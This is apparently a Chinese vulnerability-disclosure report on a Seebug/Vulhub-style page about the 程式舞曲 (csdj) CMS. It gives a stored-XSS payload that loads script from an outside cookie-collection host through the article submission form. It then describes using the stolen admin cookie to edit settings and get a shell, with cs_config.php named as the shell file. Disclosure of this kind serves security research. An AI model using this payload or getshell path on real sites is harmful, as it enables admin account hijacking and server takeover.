|程式舞曲储存型又一xss（2）附后台getshell

程式舞曲储存型又一xss（2）附后台getshell

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：好吧亲爱的广商我又来了。。发现这个广商态度还是很不错的，这样才能让自己的产品更加完善。 ### 详细说明：一： xss 添加文章处直接提交 xss代码会被过滤。用火狐live http replay post提交 ``` </textarea><script src=http://xss.webvul.com/5NVhnS></script> ``` [<img src="https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg) 好吧。。后台审核文章，编辑，看下源码 [<img src="https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg) 插进去鸟~ [<img src="https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg) 二：getshell 收到 cookie后修改基本信息 [<img src="https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg) 可以看到 phpinfo执行了 [<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg) 插一句话的话连接文件为 csdj/lib/cs_config.php 第三次提交了。。。多给点 rank瑟。。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™